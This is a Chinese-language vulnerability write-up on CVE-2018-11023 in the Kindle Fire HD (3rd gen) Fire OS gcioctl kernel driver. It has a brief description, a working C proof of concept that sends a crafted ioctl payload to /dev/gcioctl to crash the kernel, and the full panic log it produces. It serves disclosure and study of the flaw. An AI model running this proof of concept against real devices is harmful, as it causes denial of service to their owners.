(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.md
13.88 KB / 2021-07-15 19:45:56
## 一、漏洞简介
Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3的内核组件中的内核模块/omap/drivers/misc/gcx/gcioctl/gcif.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ gcioctl使用命令3222560159,并导致内核崩溃。
## 二、漏洞影响
Fire OS 4.5.5.3
## 三、复现过程
### poc
```
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/gcioctl causes the system crash via IOCTL 3222560159.
* This Poc should run with permission to do ioctl on /dev/gcioctl.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
const static char *driver = "/dev/gcioctl";
static command = 3222560159;
int main(int argc, char **argv, char **env) {
unsigned int payload[] = { 0x244085aa, 0x1a03e6ef, 0x000003f4, 0x00000000 };
int fd = 0;
fd = open(driver, O_RDONLY);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}
printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}
```
### 崩溃日志
```
[ 79.825592] init: untracked pid 3232 exited
[ 79.830841] init: untracked pid 3234 exited
[ 95.970855] Alignment trap: not handling instruction e1953f9f at [<c06a4d84>]
[ 95.978912] Unhandled fault: alignment exception (0x001) at 0x1a03e6f3
[ 95.986053] Internal error: : 1 [#1] PREEMPT SMP ARM
[ 95.991638] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 95.999145] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 96.006408] PC is at __raw_spin_lock_irqsave+0x38/0xb0
[ 96.012115] LR is at _raw_spin_lock_irqsave+0x10/0x14
[ 96.017791] pc : [<c06a4d88>] lr : [<c06a4e10>] psr: 20000093
[ 96.017822] sp : d02bfdd8 ip : d02bfdf8 fp : d02bfdf4
[ 96.030578] r10: 00000000 r9 : dd3eeca8 r8 : 00000001
[ 96.036376] r7 : 1a03e6ef r6 : 00000001 r5 : 1a03e6f3 r4 : d02be000
[ 96.043701] r3 : 00000001 r2 : 00000001 r1 : 00000082 r0 : 20000013
[ 96.050933] Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user
[ 96.058990] Control: 10c5387d Table: 96cb804a DAC: 00000015
[ 96.065460]
[ 96.065460] PC: 0xc06a4d08:
[ 96.070404] 4d08 1a000003 eaffffe6 e5903000 e3530000 0affffe3 e5903004 e3530000 1afffff9
[ 96.080810] 4d28 eaffffdf e50b0018 ebfffbab e51b0018 eaffffed e1a0c00d e92dd800 e24cb004
[ 96.091217] 4d48 ebffffcf e89da800 e1a0c00d e92dd878 e24cb004 e1a0300d e3c34d7f e3c4403f
[ 96.101776] 4d68 e1a05000 e3a06001 e5943004 e2833001 e5843004 e10f0000 f10c0080 e1953f9f
[ 96.112335] 4d88 e3330000 01853f96 e3530000 0a000014 e121f000 e5943004 e2433001 e5843004
[ 96.122894] 4da8 e5943000 e3130002 1a000010 e5953004 e3530000 e5953000 05856004 e3530000
[ 96.133361] 4dc8 1a000003 eaffffe7 e5953000 e3530000 0affffe4 e5953004 e3530000 1afffff9
[ 96.143920] 4de8 eaffffe0 f57ff05f e5853004 e89da878 ebfffb79 eaffffec e1a0c00d e92dd800
[ 96.154479]
[ 96.154479] LR: 0xc06a4d90:
[ 96.159393] 4d90 e3530000 0a000014 e121f000 e5943004 e2433001 e5843004 e5943000 e3130002
[ 96.170013] 4db0 1a000010 e5953004 e3530000 e5953000 05856004 e3530000 1a000003 eaffffe7
[ 96.180603] 4dd0 e5953000 e3530000 0affffe4 e5953004 e3530000 1afffff9 eaffffe0 f57ff05f
[ 96.191070] 4df0 e5853004 e89da878 ebfffb79 eaffffec e1a0c00d e92dd800 e24cb004 ebffffcf
[ 96.201690] 4e10 e89da800 e1a0c00d e92dd800 e24cb004 ebfffff6 e89da800 e1a0c00d e92dd800
[ 96.212341] 4e30 e24cb004 ebfffff1 e89da800 e1a0c00d e92dd818 e24cb004 ebffffc0 e1a04000
[ 96.222808] 4e50 ebe6a978 e121f004 e89da818 e1a0c00d e92dd800 e24cb004 ebfffff3 e89da800
[ 96.233612] 4e70 e1a0c00d e92dd830 e24cb004 e24dd008 e1a0300d e3c34d7f e3c4403f e3a05001
[ 96.244262]
[ 96.244262] SP: 0xd02bfd58:
[ 96.249145] fd58 00000000 0000001d 00000004 d4736f80 d4737394 c06a4d84 20000093 ffffffff
[ 96.259948] fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013 00000082
[ 96.270660] fd98 00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001 dd3eeca8
[ 96.281311] fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093 ffffffff
[ 96.292053] fdd8 0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c
[ 96.302825] fdf8 d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20
[ 96.313415] fe18 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef
[ 96.323883] fe38 bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60
[ 96.334533]
[ 96.334533] IP: 0xd02bfd78:
[ 96.339416] fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013 00000082
[ 96.349853] fd98 00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001 dd3eeca8
[ 96.360290] fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093 ffffffff
[ 96.370727] fdd8 0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c
[ 96.381042] fdf8 d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20
[ 96.391479] fe18 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef
[ 96.402008] fe38 bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60
[ 96.412445] fe58 c06a319c c06a2fec d02bff04 d02bfe70 c0317c28 c06a3194 00000001 00000028
[ 96.422790]
[ 96.422790] FP: 0xd02bfd74:
[ 96.427795] fd74 ffffffff d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013
[ 96.438140] fd94 00000082 00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001
[ 96.448699] fdb4 dd3eeca8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093
[ 96.459289] fdd4 ffffffff 0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10
[ 96.470031] fdf4 c06a4d5c d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008
[ 96.480438] fe14 c06a4e20 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54
[ 96.490875] fe34 1a03e6ef bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c
[ 96.501495] fe54 d02bfe60 c06a319c c06a2fec d02bff04 d02bfe70 c0317c28 c06a3194 00000001
[ 96.512023]
[ 96.512023] R4: 0xd02bdf80:
[ 96.517089] df80 000003ef 61ef22a8 61ef2278 61ef22d8 00000036 c0013e08 00000000 d02bdfa8
[ 96.527679] dfa0 c0013c60 c0136578 61ef22a8 61ef2278 0000000a c0186201 65490ce8 65490ce0
[ 96.538208] dfc0 61ef22a8 61ef2278 61ef22d8 00000036 00000001 65393000 6253ab8c 4010f2ec
[ 96.548797] dfe0 00000001 65490cd0 400f0273 400e3804 600f0010 0000000a 5788f1b0 0000000b
[ 96.559356] e000 00000002 00000003 00000000 d4736f80 c0a0e840 00000000 00000015 c4fcf880
[ 96.569885] e020 00000000 d02be000 c09ddc50 d4736f80 dd0be600 c1617b40 d02bfdf4 d02bfd40
[ 96.580535] e040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[ 96.591125] e060 005bc4c0 5ebfea7f 00000000 00000000 00000000 00000000 00000000 00000000
[ 96.601684]
[ 96.601684] R9: 0xdd3eec28:
[ 96.606628] ec28 dd3eec28 dd3eec28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 96.617218] ec48 00000000 00000000 dd3eec50 dd3eec50 00000000 c0aa5174 c0aa5174 c0aa5148
[ 96.627716] ec68 5aefd4d7 00000000 00000000 00000000 dd3eec80 00000000 00000000 00000000
[ 96.638275] ec88 00200000 00000000 00000000 dd3eec94 dd3eec94 dd3d6fc0 dd3d6fc0 00000000
[ 96.648864] eca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[ 96.659423] ecc8 dd3eed80 dd33ae70 00001064 00000001 0fb00000 5aefd4d7 2d2b4d15 5aefd4d7
[ 96.669921] ece8 2d2b4d15 5aefd4d7 2d2b4d15 00000000 00000000 00000000 00000000 00000000
[ 96.680572] ed08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dd3eed24
[ 96.691162] Process gcioctl_poc_3 (pid: 3395, stack limit = 0xd02be2f8)
[ 96.698455] Stack: (0xd02bfdd8 to 0xd02c0000)
[ 96.703430] fdc0: 0000020a 00000082
[ 96.712554] fde0: 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c d02bfe14 d02bfe08
[ 96.721588] fe00: c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20 d84a38d8 d84a2800
[ 96.730743] fe20: d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef bed24608 d02be000
[ 96.739837] fe40: d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60 c06a319c c06a2fec
[ 96.748840] fe60: d02bff04 d02bfe70 c0317c28 c06a3194 00000001 00000028 000fffff d02bfea0
[ 96.757934] fe80: d02bfedc d02bfe90 c0207454 c00bd920 0000001e c33a3180 d02bfed4 d02bfea8
[ 96.767059] fea0: 244085aa 1a03e6ef 000003f4 00000000 00000000 00000001 00000000 d02bff14
[ 96.776214] fec0: 00000000 00000001 dd3eeca8 c24d8a00 d02bfefc d02bfee0 c02089fc 00000000
[ 96.785247] fee0: d627f000 00000004 d627f000 bed24608 dd3eeca8 00000000 d02bff74 d02bff08
[ 96.794403] ff00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[ 96.803649] ff20: dcf8c770 d02bff0c d02be000 bed24638 bed24608 c0145d9f d627f000 00000004
[ 96.812744] ff40: d02be000 00000000 d02bff64 00000000 bed24608 c0145d9f d627f000 00000004
[ 96.821746] ff60: d02be000 00000000 d02bffa4 d02bff78 c01365e0 c0135fc4 00000000 00000000
[ 96.830932] ff80: 00000400 bed24638 00010e54 00000000 00000036 c0013e08 00000000 d02bffa8
[ 96.840118] ffa0: c0013c60 c0136578 bed24638 00010e54 00000004 c0145d9f bed24608 bed24608
[ 96.849121] ffc0: bed24638 00010e54 00000000 00000036 00000000 00000000 00000000 bed24624
[ 96.858245] ffe0: 00000000 bed245ec 00010690 0002917c 60000010 00000004 006f0063 002e006d
[ 96.867340] Backtrace:
[ 96.870330] [<c06a4d50>] (__raw_spin_lock_irqsave+0x0/0xb0) from [<c06a4e10>] (_raw_spin_lock_irqsave+0x10/0x14)
[ 96.881591] r6:d02be000 r5:1a03e6f3 r4:00000082 r3:0000020a
[ 96.888488] [<c06a4e00>] (_raw_spin_lock_irqsave+0x0/0x14) from [<c06a4e24>] (_raw_spin_lock_irq+0x10/0x14)
[ 96.899291] [<c06a4e14>] (_raw_spin_lock_irq+0x0/0x14) from [<c06a3008>] (wait_for_common+0x28/0x150)
[ 96.909729] [<c06a2fe0>] (wait_for_common+0x0/0x150) from [<c06a319c>] (wait_for_completion_interruptible_timeout+0x14/0x18)
[ 96.922149] [<c06a3188>] (wait_for_completion_interruptible_timeout+0x0/0x18) from [<c0317c28>] (dev_ioctl+0x7ec/0x10c4)
[ 96.934204] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 96.943481] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 96.952636] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 96.961822] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e54 r4:bed24638
[ 96.970153] Code: e5843004 e10f0000 f10c0080 e1953f9f (e3330000)
[ 96.977264] Board Information:
[ 96.977264] Revision : 0001
[ 96.977294] Serial : 0000000000000000
[ 96.977294] SoC Information:
[ 96.977294] CPU : OMAP4470
[ 96.977294] Rev : ES1.0
[ 96.977325] Type : HS
[ 96.977325] Production ID: 0002B975-000000CC
[ 96.977325] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 96.977355]
[ 97.013824] ---[ end trace 2432291f2b5d99ba ]---
[ 97.019195] Kernel panic - not syncing: Fatal exception
[ 97.025024] CPU1: stopping
[ 97.028137] Backtrace:
[ 97.031311] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 97.040679] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[ 97.047668] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 97.056884] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 97.066253] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[ 97.075561] Exception stack(0xd6cb7d28 to 0xd6cb7d70)
[ 97.081237] 7d20: c1620b40 c3152ac0 d799dc70 00000000 00000000 c1620b40
[ 97.090454] 7d40: d6cb6000 c4eaaf80 00000001 c4eaaf80 c1620b40 d6cb7d7c d6cb7d80 d6cb7d70
[ 97.099670] 7d60: c0074004 c06a4880 60070013 ffffffff
[ 97.105346] r6:ffffffff r5:60070013 r4:c06a4880 r3:c0074004
[ 97.112487] [<c06a485c>] (_raw_spin_unlock_irq+0x0/0x50) from [<c0074004>] (finish_task_switch+0x58/0x12c)
[ 97.123321] [<c0073fac>] (finish_task_switch+0x0/0x12c) from [<c06a36fc>] (__schedule+0x3ec/0x830)
[ 97.133239] r8:c3152ac0 r7:c09ddc50 r6:d6cb6000 r5:c09b6b40 r4:c4fcf340
[ 97.141143] r3:00000001
[ 97.144500] [<c06a3310>] (__schedule+0x0/0x830) from [<c06a3c24>] (preempt_schedule+0x40/0x5c)
[ 97.154174] [<c06a3be4>] (preempt_schedule+0x0/0x5c) from [<c06a4808>] (_raw_spin_unlock+0x48/0x4c)
[ 97.164337] r4:c0a7375c r3:00000002
[ 97.168731] [<c06a47c0>] (_raw_spin_unlock+0x0/0x4c) from [<c00983d0>] (futex_wake+0xfc/0x130)
[ 97.178436] [<c00982d4>] (futex_wake+0x0/0x130) from [<c0099868>] (do_futex+0xf8/0x9e8)
[ 97.187469] [<c0099770>] (do_futex+0x0/0x9e8) from [<c009a1ec>] (sys_futex+0x94/0x178)
[ 97.196289] [<c009a158>] (sys_futex+0x0/0x178) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 97.205871] CPU0 PC (0) : 0xc003ee38
[ 97.209930] CPU0 PC (1) : 0xc003ee54
[ 97.214111] CPU0 PC (2) : 0xc003ee54
[ 97.218170] CPU0 PC (3) : 0xc003ee54
[ 97.222229] CPU0 PC (4) : 0xc003ee54
[ 97.226409] CPU0 PC (5) : 0xc003ee54
[ 97.230468] CPU0 PC (6) : 0xc003ee54
[ 97.234527] CPU0 PC (7) : 0xc003ee54
[ 97.238739] CPU0 PC (8) : 0xc003ee54
[ 97.242767] CPU0 PC (9) : 0xc003ee54
[ 97.246826] CPU1 PC (0) : 0xc0019b2c
[ 97.251007] CPU1 PC (1) : 0xc0019b2c
[ 97.255065] CPU1 PC (2) : 0xc0019b2c
[ 97.259124] CPU1 PC (3) : 0xc0019b2c
[ 97.263183] CPU1 PC (4) : 0xc0019b2c
[ 97.267364] CPU1 PC (5) : 0xc0019b2c
[ 97.271423] CPU1 PC (6) : 0xc0019b2c
[ 97.275482] CPU1 PC (7) : 0xc0019b2c
[ 97.279693] CPU1 PC (8) : 0xc0019b2c
[ 97.283752] CPU1 PC (9) : 0xc0019b2c
[ 97.287811]
[ 97.289581] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 97.289611]
```